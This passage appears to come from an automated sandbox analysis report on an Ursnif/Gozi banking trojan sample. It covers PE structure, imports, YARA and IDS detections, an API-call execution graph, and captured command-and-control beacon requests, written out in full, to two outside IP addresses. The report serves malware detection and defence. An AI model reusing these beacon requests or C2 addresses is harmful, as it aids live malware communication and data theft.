              mov dword ptr [ebp-04h], eax
              mov edx, dword ptr [ebp+18h]
              push ebx
              Programming Language:
              • [ASM] VS2010 build 30319
              • [ C ] VS2010 build 30319
              • [IMP] VS2008 SP1 build 30729
              • [C++] VS2010 build 30319
              • [RES] VS2010 build 30319
              • [LNK] VS2010 build 30319
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x18f6c0x78.text
              IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000xdd08.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x43200x40.text
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x10000x1d4.text
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x18a140x18c00False0.5079210069444444data6.317732478321936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .data0x1a0000x90ca80x13600False0.9317036290322581data7.8277138443363325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0xab0000xdd080xde00False0.4094172297297297data4.405514301187481IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              NameRVASizeTypeLanguageCountry
              RT_CURSOR0xb6f480x130Device independent bitmap graphic, 32 x 64 x 1, image size 0
              RT_CURSOR0xb70900x130Device independent bitmap graphic, 32 x 64 x 1, image size 0
              RT_CURSOR0xb71c00xf0Device independent bitmap graphic, 24 x 48 x 1, image size 0
              RT_CURSOR0xb72b00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
              RT_ICON0xab5e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishFinland
              RT_ICON0xab5e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishNorway
              RT_ICON0xab5e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishSweden
              RT_ICON0xabe880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland
              RT_ICON0xabe880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway
              RT_ICON0xabe880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden
              RT_ICON0xacf580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishFinland
              RT_ICON0xacf580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishNorway
              RT_ICON0xacf580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishSweden
              RT_ICON0xad8000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishFinland
              RT_ICON0xad8000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishNorway
              RT_ICON0xad8000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishSweden
              RT_ICON0xafda80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland
              RT_ICON0xafda80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway
              RT_ICON0xafda80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden
              RT_ICON0xb0e800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishFinland
              RT_ICON0xb0e800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishNorway
              RT_ICON0xb0e800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishSweden
              RT_ICON0xb1d280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishFinland
              RT_ICON0xb1d280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishNorway
              RT_ICON0xb1d280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishSweden
              RT_ICON0xb23f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishFinland
              RT_ICON0xb23f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishNorway
              RT_ICON0xb23f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishSweden
              RT_ICON0xb29580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishFinland
              RT_ICON0xb29580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishNorway
              RT_ICON0xb29580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishSweden
              RT_ICON0xb4f000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland
              RT_ICON0xb4f000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway
              RT_ICON0xb4f000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden
              RT_ICON0xb5fa80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishFinland
              RT_ICON0xb5fa80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishNorway
              RT_ICON0xb5fa80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishSweden
              RT_ICON0xb69300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishFinland
              RT_ICON0xb69300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishNorway
              RT_ICON0xb69300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishSweden
              RT_STRING0xb85d80x3bedataSami LappishFinland
              RT_STRING0xb85d80x3bedataSami LappishNorway
              RT_STRING0xb85d80x3bedataSami LappishSweden
              RT_STRING0xb89980x36adataSami LappishFinland
              RT_STRING0xb89980x36adataSami LappishNorway
              RT_STRING0xb89980x36adataSami LappishSweden
              RT_ACCELERATOR0xb6ea80x90dataSami LappishFinland
              RT_ACCELERATOR0xb6ea80x90dataSami LappishNorway
              RT_ACCELERATOR0xb6ea80x90dataSami LappishSweden
              RT_ACCELERATOR0xb6e000xa8dataSami LappishFinland
              RT_ACCELERATOR0xb6e000xa8dataSami LappishNorway
              RT_ACCELERATOR0xb6e000xa8dataSami LappishSweden
              RT_GROUP_CURSOR0xb70780x14data
              RT_GROUP_CURSOR0xb83580x30data
              RT_GROUP_ICON0xb0e500x30dataSami LappishFinland
              RT_GROUP_ICON0xb0e500x30dataSami LappishNorway
              RT_GROUP_ICON0xb0e500x30dataSami LappishSweden
              RT_GROUP_ICON0xacf300x22dataSami LappishFinland
              RT_GROUP_ICON0xacf300x22dataSami LappishNorway
              RT_GROUP_ICON0xacf300x22dataSami LappishSweden
              RT_GROUP_ICON0xb6d980x68dataSami LappishFinland
              RT_GROUP_ICON0xb6d980x68dataSami LappishNorway
              RT_GROUP_ICON0xb6d980x68dataSami LappishSweden
              RT_VERSION0xb83880x24cdata
              None0xb6f380xadataSami LappishFinland
              None0xb6f380xadataSami LappishNorway
              None0xb6f380xadataSami LappishSweden
              DLLImport
              KERNEL32.dllPulseEvent, ReadConsoleInputW, GetFirmwareEnvironmentVariableW, GetCPInfoExW, CreateEventW, CopyFileExA, GetProcAddress, GlobalAlloc, SetDefaultCommConfigA, OpenWaitableTimerW, GetFileAttributesW, EnumResourceTypesW, WriteFileGather, GetModuleHandleW, InterlockedCompareExchange, UnhandledExceptionFilter, LocalFlags, GlobalLock, GetConsoleAliasW, WritePrivateProfileSectionA, FindFirstVolumeMountPointA, SetLastError, SleepEx, AddAtomA, lstrcmpA, SetCalendarInfoA, GetSystemWindowsDirectoryA, EnumTimeFormatsW, GetSystemDirectoryW, AddAtomW, GetExitCodeThread, _llseek, FindNextFileW, CopyFileA, GetShortPathNameW, EnumCalendarInfoA, EnumCalendarInfoExA, AddRefActCtx, SetStdHandle, WriteConsoleW, GetCurrentThreadId, LoadLibraryA, CloseHandle, SetFilePointer, ReadFile, FlushFileBuffers, InterlockedIncrement, InterlockedDecrement, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, EncodePointer, DecodePointer, GetLastError, HeapFree, RtlUnwind, RaiseException, HeapReAlloc, HeapAlloc, MoveFileA, DeleteFileA, GetCommandLineA, HeapSetInformation, GetStartupInfoW, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, IsProcessorFeaturePresent, HeapCreate, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameW, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW, GetLocaleInfoW, HeapSize, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, LoadLibraryW, GetConsoleCP, GetConsoleMode, CreateFileW
              USER32.dllLoadMenuW
              ADVAPI32.dllLookupAccountSidW
              SHELL32.dllFindExecutableA
              ole32.dllCoGetInstanceFromFile
              Language of compilation systemCountry where language is spokenMap
              Sami LappishFinland
              Sami LappishNorway
              Sami LappishSweden
              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              192.168.2.362.173.142.5149702802033203 03/14/23-10:06:33.670823TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4970280192.168.2.362.173.142.51
              192.168.2.394.103.183.15349703802033204 03/14/23-10:06:53.891804TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4970380192.168.2.394.103.183.153
              192.168.2.394.103.183.15349703802033203 03/14/23-10:06:53.891804TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4970380192.168.2.394.103.183.153
              TimestampSource PortDest PortSource IPDest IP
              Mar 14, 2023 10:06:33.606960058 CET4970280192.168.2.362.173.142.51
              Mar 14, 2023 10:06:33.666228056 CET804970262.173.142.51192.168.2.3
              Mar 14, 2023 10:06:33.670461893 CET4970280192.168.2.362.173.142.51
              Mar 14, 2023 10:06:33.670823097 CET4970280192.168.2.362.173.142.51
              Mar 14, 2023 10:06:33.729321957 CET804970262.173.142.51192.168.2.3
              Mar 14, 2023 10:06:33.729696035 CET804970262.173.142.51192.168.2.3
              Mar 14, 2023 10:06:33.729852915 CET4970280192.168.2.362.173.142.51
              Mar 14, 2023 10:06:33.734627962 CET4970280192.168.2.362.173.142.51
              Mar 14, 2023 10:06:33.793221951 CET804970262.173.142.51192.168.2.3
              Mar 14, 2023 10:06:53.833755970 CET4970380192.168.2.394.103.183.153
              Mar 14, 2023 10:06:53.891120911 CET804970394.103.183.153192.168.2.3
              Mar 14, 2023 10:06:53.891333103 CET4970380192.168.2.394.103.183.153
              Mar 14, 2023 10:06:53.891803980 CET4970380192.168.2.394.103.183.153
              Mar 14, 2023 10:06:53.949707985 CET804970394.103.183.153192.168.2.3
              Mar 14, 2023 10:06:53.949903965 CET804970394.103.183.153192.168.2.3
              Mar 14, 2023 10:06:53.950078011 CET4970380192.168.2.394.103.183.153
              Mar 14, 2023 10:06:53.950314999 CET4970380192.168.2.394.103.183.153
              Mar 14, 2023 10:06:54.007416964 CET804970394.103.183.153192.168.2.3
              TimestampSource PortDest PortSource IPDest IP
              Mar 14, 2023 10:05:13.437261105 CET4997753192.168.2.38.8.8.8
              Mar 14, 2023 10:05:13.466011047 CET53499778.8.8.8192.168.2.3
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Mar 14, 2023 10:05:13.437261105 CET192.168.2.38.8.8.80x2188Standard query (0)checklist.skype.comA (IP address)IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Mar 14, 2023 10:04:54.697774887 CET8.8.8.8192.168.2.30x96e7No error (0)windowsupdatebg.s.llnwi.net178.79.225.128A (IP address)IN (0x0001)false
              Mar 14, 2023 10:04:54.792893887 CET8.8.8.8192.168.2.30xdf37No error (0)windowsupdatebg.s.llnwi.net95.140.230.128A (IP address)IN (0x0001)false
              Mar 14, 2023 10:04:54.792893887 CET8.8.8.8192.168.2.30xdf37No error (0)windowsupdatebg.s.llnwi.net178.79.225.0A (IP address)IN (0x0001)false
              Mar 14, 2023 10:04:54.953008890 CET8.8.8.8192.168.2.30x8e9eNo error (0)windowsupdatebg.s.llnwi.net95.140.230.128A (IP address)IN (0x0001)false
              Mar 14, 2023 10:04:54.953008890 CET8.8.8.8192.168.2.30x8e9eNo error (0)windowsupdatebg.s.llnwi.net178.79.225.128A (IP address)IN (0x0001)false
              Mar 14, 2023 10:05:13.466011047 CET8.8.8.8192.168.2.30x2188Name error (3)checklist.skype.comnonenoneA (IP address)IN (0x0001)false
              • 62.173.142.51
              • 94.103.183.153
              Session IDSource IPSource PortDestination IPDestination PortProcess
              0192.168.2.34970262.173.142.5180C:\Users\user\Desktop\server.exe
              TimestampkBytes transferredDirectionData
              Mar 14, 2023 10:06:33.670823097 CET146OUTGET /drew/JmbbhiAvjQPEy2fkKH5/C20MAuPZ3pJbSKGRkKMPd5/SPaafj6VQ7HYu/DXcg7FNf/0ruIDzX_2BCbmxrV40i30pn/_2Fl7_2FNm/RIlbjnVOY4JvDGYwT/ix3pE9ifpnwW/elLfsP9FYx5/Hz_2B8UXu3bbwG/02zNVOFS_2BJ4kciO41Pm/zImHSH7GQInU2lqP/DXjN6xEv0EFAj_2/BIgT9NZXb86r_2B9_2/BglAnU64W/pXOd3Bpq_2B6reFFKiya/vrT62aiDk4ODnu2FLTN/8RaHDJKURayKv5wSn6_2Be/98LSI75Q/Y.jlk HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
              Host: 62.173.142.51
              Connection: Keep-Alive
              Cache-Control: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              1192.168.2.34970394.103.183.15380C:\Users\user\Desktop\server.exe
              TimestampkBytes transferredDirectionData
              Mar 14, 2023 10:06:53.891803980 CET148OUTGET /drew/YFRpxaGPy8aTA/lEGs8EM8/Li7lynDfGk0I7iN9t374AB4/_2F1sUMTN1/UEydFJqSZ58U_2F2I/_2BvyAdt9u0H/WCLmPUk5rVd/uPrGHMrocX5QVL/vZ2he4yFsZbEEyVtFNsbb/6QOP5S8lc_2FKLii/xRSfDf8YM_2FzYv/JxYXyyfiAzE2PV12L5/JuemxitNz/bnxpv6OPuPk9wUQcNjGi/ZDSmE4RX8aWzG6bOjDV/nfzi9OTwpfQDL9S9rr7z8q/2mJBpjpAq_2FS/pQy2VF6z/1Yqd6OeimKP7Ws/XDYic_2B/Y.jlk HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
              Host: 94.103.183.153
              Connection: Keep-Alive
              Cache-Control: no-cache


              Click to jump to process

              Click to jump to process

              Target ID:0
              Start time:10:05:01
              Start date:14/03/2023
              Path:C:\Users\user\Desktop\server.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\server.exe
              Imagebase:0x400000
              File size:238592 bytes
              MD5 hash:7936264575923F443302A9BB14688AB7
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.513562635.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.398058433.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.398058433.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.398058433.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.398160949.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.398160949.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.398160949.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.398146053.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.398146053.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.398146053.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.398126979.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.398126979.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.398126979.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.398008466.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.398008466.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.398008466.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.398107803.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.398107803.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.398107803.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.513904816.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.513904816.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.513904816.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.398084556.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.513699269.00000000005B0000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.398084556.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.398084556.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.398172472.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.398172472.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.398172472.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              Reputation:low

              Reset < >

                Execution Graph

                Execution Coverage:7.1%
                Dynamic/Decrypted Code Coverage:98.4%
                Signature Coverage:31.6%
                Total number of Nodes:253
                Total number of Limit Nodes:16
                execution_graph 5193 4d003c 5194 4d0049 5193->5194 5206 4d0e0f SetErrorMode SetErrorMode 5194->5206 5199 4d0265 5200 4d02ce VirtualProtect 5199->5200 5202 4d030b 5200->5202 5201 4d0439 VirtualFree 5205 4d04be LoadLibraryA 5201->5205 5202->5201 5204 4d08c7 5205->5204 5207 4d0223 5206->5207 5208 4d0d90 5207->5208 5209 4d0dad 5208->5209 5210 4d0dbb GetPEB 5209->5210 5211 4d0238 VirtualAlloc 5209->5211 5210->5211 5211->5199 5212 401de1 HeapCreate 5213 401dfa GetModuleHandleA GetCommandLineW 5212->5213 5214 401e1f ExitProcess 5212->5214 5217 4019f1 5213->5217 5249 401d68 CreateEventA 5217->5249 5220 401a1e NtQuerySystemInformation 5221 4019fc 5220->5221 5221->5220 5226 401ba4 HeapDestroy 5221->5226 5256 4012e6 RtlAllocateHeap 5221->5256 5257 401688 5221->5257 5277 401ba9 RtlFreeHeap 5221->5277 5225 401a7b 5225->5226 5227 401a85 GetLocaleInfoA 5225->5227 5226->5214 5228 401ab7 5227->5228 5229 401a9f GetSystemDefaultUILanguage VerLanguageNameA 5227->5229 5230 401b96 5228->5230 5263 401800 5228->5263 5229->5228 5230->5226 5232 401b9e GetLastError 5230->5232 5232->5226 5234 401ad3 GetLongPathNameW 5235 401ae7 5234->5235 5248 401b05 CreateThread 5234->5248 5275 4012e6 RtlAllocateHeap 5235->5275 5237 401b33 QueueUserAPC 5240 401b69 5237->5240 5241 401b4d GetLastError TerminateThread CloseHandle SetLastError 5237->5241 5238 401b8d GetLastError 5238->5230 5240->5238 5243 401b6d WaitForSingleObject 5240->5243 5241->5240 5242 401af1 5244 401afa GetLongPathNameW 5242->5244 5242->5248 5245 401b88 CloseHandle 5243->5245 5246 401b7d GetExitCodeThread 5243->5246 5276 401ba9 RtlFreeHeap 5244->5276 5245->5230 5246->5245 5248->5237 5248->5238 5250 401d86 GetVersion 5249->5250 5251 401dda GetLastError 5249->5251 5252 401d90 5250->5252 5253 401d9d GetCurrentProcessId OpenProcess 5252->5253 5254 401dd5 5252->5254 5255 401dca 5253->5255 5254->5221 5255->5221 5256->5221 5258 4016af 5257->5258 5259 4017ed Sleep 5258->5259 5278 4012e6 RtlAllocateHeap 5258->5278 5259->5221 5259->5225 5261 40171e 5261->5259 5279 401ba9 RtlFreeHeap 5261->5279 5280 4012e6 RtlAllocateHeap 5263->5280 5265 40181e 5266 401824 GetModuleFileNameW 5265->5266 5267 401877 5265->5267 5268 401855 5266->5268 5272 401836 5266->5272 5267->5234 5267->5248 5268->5267 5270 401860 5268->5270 5271 401867 GetLastError 5268->5271 5270->5267 5283 401ba9 RtlFreeHeap 5271->5283 5272->5266 5272->5268 5281 401ba9 RtlFreeHeap 5272->5281 5282 4012e6 RtlAllocateHeap 5272->5282 5275->5242 5276->5248 5277->5221 5278->5261 5279->5259 5280->5265 5281->5272 5282->5272 5283->5270 5365 4d2048 HeapCreate 5366 4d2086 ExitProcess 5365->5366 5367 4d2061 GetModuleHandleA GetCommandLineW 5365->5367 5370 4d1c58 5367->5370 5399 4d1fcf CreateEventA 5370->5399 5372 4d1c63 5374 4d1c85 NtQuerySystemInformation 5372->5374 5380 4d1e0b HeapDestroy 5372->5380 5406 4d154d RtlAllocateHeap 5372->5406 5407 4d1e10 HeapFree 5372->5407 5408 4d18ef 5372->5408 5374->5372 5378 4d1ce2 5379 4d1cec GetLocaleInfoA 5378->5379 5378->5380 5381 4d1d1e 5379->5381 5382 4d1d06 GetSystemDefaultUILanguage VerLanguageNameA 5379->5382 5380->5366 5383 4d1def 5381->5383 5414 4d1a67 5381->5414 5382->5381 5383->5380 5384 4d1e05 GetLastError 5383->5384 5384->5380 5386 4d1d6c CreateThread 5388 4d1d9a QueueUserAPC 5386->5388 5389 4d1df4 GetLastError 5386->5389 5390 4d1db4 GetLastError TerminateThread 5388->5390 5391 4d1dd0 5388->5391 5389->5383 5397 4d1dc7 SetLastError 5390->5397 5391->5389 5394 4d1dd4 WaitForSingleObject 5391->5394 5394->5383 5395 4d1de4 GetExitCodeThread 5394->5395 5395->5383 5396 4d1d58 5396->5386 5425 4d1e10 HeapFree 5396->5425 5397->5391 5400 4d1fed GetVersion 5399->5400 5401 4d2041 GetLastError 5399->5401 5402 4d1ff7 5400->5402 5403 4d2004 GetCurrentProcessId OpenProcess 5402->5403 5404 4d203c 5402->5404 5405 4d2031 5403->5405 5404->5372 5405->5372 5406->5372 5407->5372 5409 4d1916 5408->5409 5410 4d1a54 Sleep 5409->5410 5426 4d154d RtlAllocateHeap 5409->5426 5410->5372 5410->5378 5412 4d1985 5412->5410 5427 4d1e10 HeapFree 5412->5427 5428 4d154d RtlAllocateHeap 5414->5428 5416 4d1a8b GetModuleFileNameW 5417 4d1abc 5416->5417 5421 4d1a85 5416->5421 5418 4d1ac7 5417->5418 5420 4d1ace GetLastError 5417->5420 5418->5386 5424 4d154d RtlAllocateHeap 5418->5424 5431 4d1e10 HeapFree 5420->5431 5421->5416 5421->5417 5421->5418 5429 4d1e10 HeapFree 5421->5429 5430 4d154d RtlAllocateHeap 5421->5430 5424->5396 5425->5386 5426->5412 5427->5410 5428->5421 5429->5421 5430->5421 5431->5418 5284 410a56 5287 410a62 5284->5287 5285 410a6e 5286 410a90 RtlAllocateHeap 5286->5285 5286->5287 5287->5285 5287->5286 5432 4d0005 5448 4d092b GetPEB 5432->5448 5434 4d0030 5450 4d003c 5434->5450 5449 4d0972 5448->5449 5449->5434 5451 4d0049 5450->5451 5452 4d0e0f 2 API calls 5451->5452 5453 4d0223 5452->5453 5454 4d0d90 GetPEB 5453->5454 5455 4d0238 VirtualAlloc 5454->5455 5456 4d0265 5455->5456 5457 4d02ce VirtualProtect 5456->5457 5459 4d030b 5457->5459 5458 4d0439 VirtualFree 5462 4d04be LoadLibraryA 5458->5462 5459->5458 5461 4d08c7 5462->5461 5463 4d1606 5464 4d161f 5463->5464 5473 4d1ae9 5464->5473 5466 4d1658 5467 4d165c lstrlenW 5466->5467 5468 4d16b3 RtlExitUserThread 5466->5468 5478 4d1817 GetSystemTimeAsFileTime 5467->5478 5472 4d167f 5487 4d1562 5472->5487 5476 4d1b4a 5473->5476 5475 4d1bf5 5475->5466 5476->5475 5498 4d154d RtlAllocateHeap 5476->5498 5499 4d1e10 HeapFree 5476->5499 5479 4d183f 5478->5479 5480 4d1875 CreateFileMappingW 5479->5480 5481 4d18d8 GetLastError 5480->5481 5482 4d1890 5480->5482 5483 4d18b9 5481->5483 5484 4d18a9 MapViewOfFile 5482->5484 5485 4d18a4 5482->5485 5483->5472 5484->5483 5484->5485 5485->5483 5486 4d18cf CloseHandle 5485->5486 5486->5483 5500 4d1469 5487->5500 5489 4d15fa 5489->5468 5490 4d159e 5490->5489 5491 4d15e8 5490->5491 5507 4d1267 5490->5507 5516 4d1e10 HeapFree 5491->5516 5497 4d15e0 GetLastError 5497->5491 5498->5476 5499->5476 5517 4d154d RtlAllocateHeap 5500->5517 5502 4d1477 5503 4d1481 GetModuleHandleA 5502->5503 5505 4d152d 5502->5505 5506 4d14b1 5503->5506 5505->5490 5506->5505 5518 4d1e10 HeapFree 5506->5518 5508 4d135e 5507->5508 5509 4d128a 5507->5509 5508->5491 5512 4d1736 5508->5512 5509->5508 5510 4d129b LoadLibraryA 5509->5510 5511 4d130d GetProcAddress 5509->5511 5510->5508 5510->5509 5511->5509 5514 4d1771 5512->5514 5513 4d15cb 5513->5491 5513->5497 5514->5513 5515 4d17ea GetLastError 5514->5515 5515->5514 5516->5489 5517->5502 5518->5505 5519 4d0001 5520 4d0005 5519->5520 5521 4d092b GetPEB 5520->5521 5522 4d0030 5521->5522 5523 4d003c 7 API calls 5522->5523 5524 4d0038 5523->5524 5525 4d0e0f 2 API calls 5524->5525 5526 4d0223 5525->5526 5527 4d0d90 GetPEB 5526->5527 5528 4d0238 VirtualAlloc 5527->5528 5529 4d0265 5528->5529 5530 4d02ce VirtualProtect 5529->5530 5532 4d030b 5530->5532 5531 4d0439 VirtualFree 5535 4d04be LoadLibraryA 5531->5535 5532->5531 5534 4d08c7 5535->5534 5288 40139f 5289 4013b8 5288->5289 5300 401d3c ConvertStringSecurityDescriptorToSecurityDescriptorA 5289->5300 5291 4013cc 5301 401882 5291->5301 5293 4013f1 5294 4013f5 lstrlenW 5293->5294 5298 40144c ExitThread 5293->5298 5306 4015b0 